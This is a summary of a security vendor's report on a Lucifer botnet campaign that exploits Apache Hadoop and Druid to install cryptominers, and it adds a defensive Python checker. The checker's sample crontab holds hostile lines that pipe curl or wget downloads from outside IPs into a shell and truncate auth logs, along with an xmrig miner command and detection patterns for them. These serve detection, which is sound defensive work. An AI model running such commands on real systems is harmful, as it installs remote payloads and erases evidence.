Lucifer DDoS botnet Malware is Targeting Apache Big-Data Stack
Aqua Nautilus has identified a new campaign targeting the Apache big-data stack, specifically Apache Hadoop and Apache Druid, by exploiting misconfigurations and vulnerabilities. The campaign uses a variant of the Lucifer DDoS botnet malware to turn vulnerable Linux systems into Monero cryptomining bots. The campaign has evolved over time: it initially involved a single dropper and cryptominer, then two binaries of which only one was executed, and finally two droppers, one of which executes the cryptominer.

The malware is capable of command and control operations, self-propagation through multiple vulnerabilities, credential brute-forcing, and deploying backdoors for intranet infections. The attack flow begins with the exploitation of a misconfiguration or vulnerability, followed by downloading and executing the Lucifer malware, and finally downloading and executing the main payload, an XMRig cryptominer. Persistence is achieved by scheduling jobs to execute the attack, while defense evasion includes binary deletion, packing binaries, and truncating logs. System information is gathered to support mining operations, and the impact is primarily resource hijacking for cryptomining activity.

Aqua's Cloud Native Application Protection Platform (CNAPP) provides protection against such threats by scanning for vulnerabilities, malware, hidden secrets, configuration errors, and open-source license issues. It integrates with CI/CD pipelines to ensure only authorized images are deployed and offers runtime controls to protect against exploit attempts in real time.

To protect environments from such attacks, it is recommended to keep systems updated, properly configure environments, use runtime detection and response solutions to identify unknown threats, and be cautious when using open-source libraries. Indicators of Compromise (IOCs) associated with the Lucifer malware campaign are provided for further investigation and defense.
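A defender-side check for the persistence and evasion traits listed in the summary (a scheduled job that fetches and pipes a payload into a shell, log truncation, and an XMRig miner process), added here as an example and not part of the original article; the crontab and process lines are constructed samples, and the indicator strings are assumptions rather than IOCs from the report.

```python
import re

# Constructed sample crontab (not from the report). The last two entries mimic the
# "scheduled job downloads and executes the payload, then truncates a log" pattern.
SAMPLE_CRONTAB = """\
0 2 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * /opt/hadoop/bin/hdfs dfsadmin -report > /var/log/hdfs-report.log
* * * * * curl -fsSL http://198.51.100.23/lucifer.sh | sh
*/10 * * * * wget -q -O - http://203.0.113.9/x.sh | bash; > /var/log/auth.log
"""

# Constructed sample process command lines: a legitimate Druid service and a miner.
SAMPLE_PROCESSES = [
    "java -Xmx4g org.apache.druid.cli.Main server historical",
    "/tmp/.x/xmrig -o stratum+tcp://pool.example:3333 -u WALLET --donate-level 1",
]

# curl/wget output piped straight into a shell interpreter.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sh|bash)\b")
# A bare redirect into /var/log at the start of a command (i.e. truncation, not logging).
LOG_TRUNCATE = re.compile(r"(^|[;&|]\s*)>\s*/var/log/\S+")
# Assumed miner hints: the binary name, the stratum pool scheme, and a well-known xmrig flag.
MINER_HINTS = ("xmrig", "stratum+tcp://", "--donate-level")


def suspicious_cron_entries(crontab):
    """Return each non-comment crontab entry that matches a persistence/evasion pattern."""
    findings = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if DOWNLOAD_EXEC.search(line):
            reasons.append("remote download piped to shell")
        if LOG_TRUNCATE.search(line):
            reasons.append("log truncation")
        if reasons:
            findings.append({"entry": line, "reasons": reasons})
    return findings


def miner_processes(cmdlines):
    """Return command lines that carry any of the assumed miner indicators."""
    return [c for c in cmdlines if any(h in c.lower() for h in MINER_HINTS)]


if __name__ == "__main__":
    for f in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron:", f["reasons"], "->", f["entry"])
    for p in miner_processes(SAMPLE_PROCESSES):
        print("miner:", p)
```

On a live host, feed it the output of `crontab -l` for each user plus the files under /etc/cron.d, and the command lines from `ps -eo args`.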
Malware: Lucifer

CVEs: CVE-2021-25646

[View Article](https://blog.aquasec.com/lucifer-ddos-botnet-malware-is-targeting-apache-big-data-stack)